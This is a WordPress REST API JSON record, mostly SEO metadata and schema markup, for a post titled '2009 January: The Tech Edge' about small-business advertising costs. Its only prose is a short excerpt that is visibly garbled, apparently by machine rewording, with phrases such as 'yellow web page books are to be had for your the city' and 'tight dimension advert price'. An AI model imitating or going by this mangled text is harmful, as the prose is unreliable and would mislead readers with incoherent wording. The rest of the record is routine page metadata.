What number of other yellow web page books are to be had for your the city? What does a tight dimension advert price in one in all them? What does a full-blown, fl ash animated Internet website with video and on-line ordering price? Would you be stunned if I informed you about $35 to $60 […]<\/p>\n","protected":false},"author":1,"featured_media":10304,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":["post-10302","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pizza"],"yoast_head":"\n2009 January: The Tech Edge - Every Province<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"2009 January: The Tech Edge - Every Province\" \/>\n<meta property=\"og:description\" content=\"What number of other yellow web page books are to be had for your the city? What does a tight dimension advert price in one in all them? What does a full-blown, fl ash animated Internet website with video and on-line ordering price? Would you be stunned if I informed you about $35 to $60 […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/\" \/>\n<meta property=\"og:site_name\" content=\"Every Province\" \/>\n<meta property=\"article:published_time\" content=\"2024-04-13T14:00:47+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/pizzatoday.com\/wp-content\/uploads\/2013\/10\/Magazines\/Year\/2009\/January\/techEdge.jpg\" \/>\n<meta name=\"author\" content=\"Camille Moreau\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Camille Moreau\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/\",\"url\":\"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/\",\"name\":\"2009 January: The Tech Edge - Every Province\",\"isPartOf\":{\"@id\":\"https:\/\/everyprovince.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/everyprovince.com\/wp-content\/uploads\/2013\/10\/Magazines\/Year\/2009\/January\/techEdge.jpg\",\"datePublished\":\"2024-04-13T14:00:47+00:00\",\"dateModified\":\"2024-04-13T14:00:47+00:00\",\"author\":{\"@id\":\"https:\/\/everyprovince.com\/#\/schema\/person\/b8d832df9d0a6f60bf42fbff709c38b2\"},\"breadcrumb\":{\"@id\":\"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/#primaryimage\",\"url\":\"https:\/\/everyprovince.com\/wp-content\/uploads\/2013\/10\/Magazines\/Year\/2009\/January\/techEdge.jpg\",\"contentUrl\":\"https:\/\/everyprovince.com\/wp-content\/uploads\/2013\/10\/Magazines\/Year\/2009\/January\/techEdge.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/everyprovince.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"2009 January: The Tech Edge\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/everyprovince.com\/#website\",\"url\":\"https:\/\/everyprovince.com\/\",\"name\":\"Every Province\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/everyprovince.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/everyprovince.com\/#\/schema\/person\/b8d832df9d0a6f60bf42fbff709c38b2\",\"name\":\"Camille Moreau\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/everyprovince.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/everyprovince.com\/wp-content\/uploads\/2024\/02\/binary-1327493_1280.jpg\",\"contentUrl\":\"https:\/\/everyprovince.com\/wp-content\/uploads\/2024\/02\/binary-1327493_1280.jpg\",\"caption\":\"Camille Moreau\"},\"description\":\"My name is Camille, and I am passionate about both cooking and journalism. My journey began in the kitchen, exploring flavors and culinary techniques. With a background in journalism, I turned this passion into my career, sharing recipes, stories, and culinary tips with the world. My words are seasoned with a love for food and the precision of journalism, providing readers with a delightful and informative experience.\",\"sameAs\":[\"https:\/\/everyprovince.com\"],\"url\":\"https:\/\/everyprovince.com\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"2009 January: The Tech Edge - Every Province","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/","og_locale":"en_US","og_type":"article","og_title":"2009 January: The Tech Edge - Every Province","og_description":"What number of other yellow web page books are to be had for your the city? What does a tight dimension advert price in one in all them? What does a full-blown, fl ash animated Internet website with video and on-line ordering price? Would you be stunned if I informed you about $35 to $60 […]","og_url":"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/","og_site_name":"Every Province","article_published_time":"2024-04-13T14:00:47+00:00","og_image":[{"url":"https:\/\/pizzatoday.com\/wp-content\/uploads\/2013\/10\/Magazines\/Year\/2009\/January\/techEdge.jpg"}],"author":"Camille Moreau","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Camille Moreau","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/","url":"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/","name":"2009 January: The Tech Edge - Every Province","isPartOf":{"@id":"https:\/\/everyprovince.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/#primaryimage"},"image":{"@id":"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/#primaryimage"},"thumbnailUrl":"https:\/\/everyprovince.com\/wp-content\/uploads\/2013\/10\/Magazines\/Year\/2009\/January\/techEdge.jpg","datePublished":"2024-04-13T14:00:47+00:00","dateModified":"2024-04-13T14:00:47+00:00","author":{"@id":"https:\/\/everyprovince.com\/#\/schema\/person\/b8d832df9d0a6f60bf42fbff709c38b2"},"breadcrumb":{"@id":"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/everyprovince.com\/2009-january-the-tech-edge\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/#primaryimage","url":"https:\/\/everyprovince.com\/wp-content\/uploads\/2013\/10\/Magazines\/Year\/2009\/January\/techEdge.jpg","contentUrl":"https:\/\/everyprovince.com\/wp-content\/uploads\/2013\/10\/Magazines\/Year\/2009\/January\/techEdge.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/everyprovince.com\/"},{"@type":"ListItem","position":2,"name":"2009 January: The Tech Edge"}]},{"@type":"WebSite","@id":"https:\/\/everyprovince.com\/#website","url":"https:\/\/everyprovince.com\/","name":"Every Province","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/everyprovince.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/everyprovince.com\/#\/schema\/person\/b8d832df9d0a6f60bf42fbff709c38b2","name":"Camille Moreau","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/everyprovince.com\/#\/schema\/person\/image\/","url":"https:\/\/everyprovince.com\/wp-content\/uploads\/2024\/02\/binary-1327493_1280.jpg","contentUrl":"https:\/\/everyprovince.com\/wp-content\/uploads\/2024\/02\/binary-1327493_1280.jpg","caption":"Camille Moreau"},"description":"My name is Camille, and I am passionate about both cooking and journalism. My journey began in the kitchen, exploring flavors and culinary techniques. With a background in journalism, I turned this passion into my career, sharing recipes, stories, and culinary tips with the world. My words are seasoned with a love for food and the precision of journalism, providing readers with a delightful and informative experience.","sameAs":["https:\/\/everyprovince.com"],"url":"https:\/\/everyprovince.com\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/everyprovince.com\/wp-json\/wp\/v2\/posts\/10302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/everyprovince.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/everyprovince.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/everyprovince.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/everyprovince.com\/wp-json\/wp\/v2\/comments?post=10302"}],"version-history":[{"count":1,"href":"https:\/\/everyprovince.com\/wp-json\/wp\/v2\/posts\/10302\/revisions"}],"predecessor-version":[{"id":10303,"href":"https:\/\/everyprovince.com\/wp-json\/wp\/v2\/posts\/10302\/revisions\/10303"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/everyprovince.com\/wp-json\/wp\/v2\/media\/10304"}],"wp:attachment":[{"href":"https:\/\/everyprovince.com\/wp-json\/wp\/v2\/media?parent=10302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/everyprovince.com\/wp-json\/wp\/v2\/categories?post=10302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/everyprovince.com\/wp-json\/wp\/v2\/tags?post=10302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}